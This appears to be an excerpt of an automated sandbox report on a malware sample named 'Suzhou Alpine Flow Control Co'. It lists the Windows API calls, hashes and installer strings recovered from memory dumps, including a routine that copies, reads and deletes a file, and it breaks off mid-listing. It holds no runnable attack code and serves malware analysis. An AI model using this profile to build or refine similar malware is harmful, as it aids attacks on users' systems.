                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 5f31e1faf654323a584286bf8fac00325aa625f5f678decd772562caf9a38c0c
                                                                                                    • Instruction ID: eed9c51f2d7595159b1eeddf7879ea01e94f80e52d37ed7ac6d24c67218e3547
                                                                                                    • Opcode Fuzzy Hash: 5f31e1faf654323a584286bf8fac00325aa625f5f678decd772562caf9a38c0c
                                                                                                    • Instruction Fuzzy Hash: 3911E67A96024DFFCB21DF54E840CDD3FB5EF44294B9964A1BD098FA21DA31DA50DB80
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DecodePointer
                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                    • Opcode ID: 55e84de6fe870bb7c165a67094a036c152966565a9f2e47131cb04abd21d1071
                                                                                                    • Instruction ID: e28d250e20ad8a19d46ed180a4ade980b1c75b3ab129b9f84c4ba0ebf2a5241c
                                                                                                    • Opcode Fuzzy Hash: 55e84de6fe870bb7c165a67094a036c152966565a9f2e47131cb04abd21d1071
                                                                                                    • Instruction Fuzzy Hash: 8D519CF4B0074ACBEB00DFA8F94859CBBB5FF49318F545599E480BB664CB358A24CB14
                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D1B
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 33561D37
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D4B
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D58
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D7D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 33561D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1454806937-0
                                                                                                    • Opcode ID: 65ab16efba1f526de6f657ba4ef36b2d4dc0814b70540a9975b11ba70290ff2c
                                                                                                    • Instruction ID: 779f25593132f7f7c0e54bdf48ca95b7077e13693d8d428f10185da8b0d30f52
                                                                                                    • Opcode Fuzzy Hash: 65ab16efba1f526de6f657ba4ef36b2d4dc0814b70540a9975b11ba70290ff2c
                                                                                                    • Instruction Fuzzy Hash: 642131B194121CBFE720ABA4DC8CEEB76FCEB48358F441965F551E2140E6709E478B70
                                                                                                    APIs
                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                    • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                    • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                    • GetSysColor.USER32(?), ref: 00404265
                                                                                                    • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                    • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                    • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                    • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                    APIs
                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,33569C07,?,00000000,?,00000000,00000000), ref: 335694D4
                                                                                                    • __fassign.LIBCMT ref: 3356954F
                                                                                                    • __fassign.LIBCMT ref: 3356956A
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 33569590
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,33569C07,00000000,?,?,?,?,?,?,?,?,?,33569C07,?), ref: 335695AF
                                                                                                    • WriteFile.KERNEL32(?,?,?,33569C07,00000000,?,?,?,?,?,?,?,?,?,33569C07,?), ref: 335695E8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                    • String ID:
                                                                                                    • API String ID: 1324828854-0
                                                                                                    • Opcode ID: c5f79d7156dce8def63ebf7b7e9889259d9e161dbbfd8c587af54492f9936d70
                                                                                                    • Instruction ID: 3e4e4cf730b68aaee520ef08e7308b7b756f2312f29eea45ba46998020273fb5
                                                                                                    • Opcode Fuzzy Hash: c5f79d7156dce8def63ebf7b7e9889259d9e161dbbfd8c587af54492f9936d70
                                                                                                    • Instruction Fuzzy Hash: A651AFB1D00349AFDB00CFA8D895AEEFBF8EF08314F14551AE951E7281E7709942CBA0
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(?,?,?,?), ref: 004025DB
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402616
                                                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402639
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264F
                                                                                                      • Part of subcall function 00405C7B: ReadFile.KERNEL32(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C8F
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                    • String ID: 9
                                                                                                    • API String ID: 1149667376-2366072709
                                                                                                    • Opcode ID: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                                                                    • Instruction ID: 7a29d1be5ffbe8e369a4709248b8008a71e905d773f4f6332667e592b1311aba
                                                                                                    • Opcode Fuzzy Hash: 25305ac4e9b43401c62344d4a8783106e8ed45d883596a7dd8de98379e43bd88
                                                                                                    • Instruction Fuzzy Hash: BB51E671E04209ABDF24DF94DA88AAEB779FF04304F50443BE501B62D0D7B99E42CB69
                                                                                                    APIs
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 3356339B
                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 335633A3
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 33563431
                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 3356345C
                                                                                                    • _ValidateLocalCookies.LIBCMT ref: 335634B1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 1170836740-1018135373
                                                                                                    • Opcode ID: 1355c57090f44042e67fe0b39c15fa8a91756d8d164a9cf9748471eb6ff859ec
                                                                                                    • Instruction ID: 83e1d44c0f4993dc9c44138dafa19a18a73a15ee9f57247ef651effedd3f8ebd
                                                                                                    • Opcode Fuzzy Hash: 1355c57090f44042e67fe0b39c15fa8a91756d8d164a9cf9748471eb6ff859ec
                                                                                                    • Instruction Fuzzy Hash: AF41D678E003489BCB01CF68E844A9EBBF5AF9532DF589155E815AB361DB31DA05CF90
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3294113728-0
                                                                                                    • Opcode ID: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                                                                    • Instruction ID: 760673b96d72cef8a70f9bf76d43f75bad9b7db283b6dfdc5a98cea5addec372
                                                                                                    • Opcode Fuzzy Hash: 38bdd8529c47ea5edffceb92d72af5ec9064ba07a11341120463422747a5320d
                                                                                                    • Instruction Fuzzy Hash: A631A072C00118BBDF11AFA5CE49DAF7E79EF05364F20423AF510762E1C6796E418BA9
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                    • lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                    • lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                    • SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2531174081-0
                                                                                                    • Opcode ID: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                                                                    • Instruction ID: 32bcb3a4223b847dfb51cc2a11ed2745bf7a1ac09c1f1387fae00188f216a620
                                                                                                    • Opcode Fuzzy Hash: e6254bc0b427cfb90636518a2a52407bbdb88d41cc3866dc0c37eea2ece6cf4b
                                                                                                    • Instruction Fuzzy Hash: 85219071900658BBCB119F55DD84ADFBFB8EF44350F54807AF904B62A0C7798A41CFA8
                                                                                                    APIs
                                                                                                      • Part of subcall function 33569221: _free.LIBCMT ref: 3356924A
                                                                                                    • _free.LIBCMT ref: 335692AB
                                                                                                      • Part of subcall function 3356571E: HeapFree.KERNEL32(00000000,00000000,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?), ref: 33565734
                                                                                                      • Part of subcall function 3356571E: GetLastError.KERNEL32(?,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?,?), ref: 33565746
                                                                                                    • _free.LIBCMT ref: 335692B6
                                                                                                    • _free.LIBCMT ref: 335692C1
                                                                                                    • _free.LIBCMT ref: 33569315
                                                                                                    • _free.LIBCMT ref: 33569320
                                                                                                    • _free.LIBCMT ref: 3356932B
                                                                                                    • _free.LIBCMT ref: 33569336
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction ID: 1caa6765dbbf1873a700181ead6a97fcb0722c695edc96f67d28ef7bab0ec47e
                                                                                                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                    • Instruction Fuzzy Hash: 41117F71D80B08EAD670ABB0EC45FCBFBBD9F84708FC41C24A69B76852DB26B5444651
                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402D35
                                                                                                    • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                    • wsprintfW.USER32 ref: 00402D81
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                      • Part of subcall function 00402CFE: MulDiv.KERNEL32(?,00000064,?), ref: 00402D13
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 722711167-2449383134
                                                                                                    • Opcode ID: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                                                                    • Instruction ID: 78f52ac4307216ae4daf114a653e214d9194ffd889c5bb91718f5c3abb157098
                                                                                                    • Opcode Fuzzy Hash: ebd009b060d6928dfd3d4acf8f2c4ed0ef9a07e9986a444e5ec5ed1f97bf102b
                                                                                                    • Instruction Fuzzy Hash: D1015E31909220EBC7616B64EE5DBDA3AA8AF00704B14457BF905B11F5C6B85C45CFAE
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B19
                                                                                                    • GetMessagePos.USER32 ref: 00404B21
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404B3B
                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B4D
                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B73
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction ID: 7d165c7f7153624e3963f679d066e3c154625e4b871d361bb7407d5cf98d8b00
                                                                                                    • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                    • Instruction Fuzzy Hash: 97014C71D00219BADB00DB94DD85FFEBBBCAB59711F10412ABB10B71D0D7B4A9018BA5
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9D
                                                                                                    • wsprintfW.USER32 ref: 00402CD1
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                    • Opcode ID: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                    • Instruction ID: 1a6e545745197b7d5f0e024d91f0b7ce6738c211f373f8126abe8c19e9ad5020
                                                                                                    • Opcode Fuzzy Hash: d7a3991d3a07419e7fab2ec9ad69e777b35ce877a0d2332f2df68b5c385b0569
                                                                                                    • Instruction Fuzzy Hash: A6F03670504108BBEF205F50DD4ABEE3768FB00309F00843AFA16B51D1DBB95959DF59
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,33566FFD,00000000,?,?,?,33568A72,?,?,00000100), ref: 3356887B
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,33568A72,?,?,00000100,5EFC4D8B,?,?), ref: 33568901
                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 335689FB
                                                                                                    • __freea.LIBCMT ref: 33568A08
                                                                                                      • Part of subcall function 335656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33565702
                                                                                                    • __freea.LIBCMT ref: 33568A11
                                                                                                    • __freea.LIBCMT ref: 33568A36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1414292761-0
                                                                                                    • Opcode ID: e76ee5a8df2de0c6c2e75f132a7c2345a40afbf00a296a77efbf9a1560bc3dc4
                                                                                                    • Instruction ID: 2b60e245aa23e3de9c4b0a6807ca789cee764c836bb97a0c646025e9ac6ad66b
                                                                                                    • Opcode Fuzzy Hash: e76ee5a8df2de0c6c2e75f132a7c2345a40afbf00a296a77efbf9a1560bc3dc4
                                                                                                    • Instruction Fuzzy Hash: 2351F6B2A10316AFEB158E64EC40EAB77B9EF8476DF556A28FC04E7140EB35DC50C690
                                                                                                    APIs
                                                                                                    • _strlen.LIBCMT ref: 33561607
                                                                                                    • _strcat.LIBCMT ref: 3356161D
                                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,3356190E,?,?,00000000,?,00000000), ref: 33561643
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,3356190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 3356165A
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,3356190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 33561661
                                                                                                    • lstrcatW.KERNEL32(00001008,?,?,?,?,?,3356190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 33561686
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1922816806-0
                                                                                                    • Opcode ID: 85717300797cbce001ec1c4b57c068ca8b426d50ddcf23cd293d5baaf6443b49
                                                                                                    • Instruction ID: 5e6940ede474750edf099e2f43eddd8dfc8e233d3485de8bd58c6fd8737ca6f0
                                                                                                    • Opcode Fuzzy Hash: 85717300797cbce001ec1c4b57c068ca8b426d50ddcf23cd293d5baaf6443b49
                                                                                                    • Instruction Fuzzy Hash: 0F21C576D00304BBDB049F68EC81EFE77B8EF88725F24541AE504BB181EB74A64287A5
                                                                                                    APIs
                                                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 33561038
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 3356104B
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 33561061
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 33561075
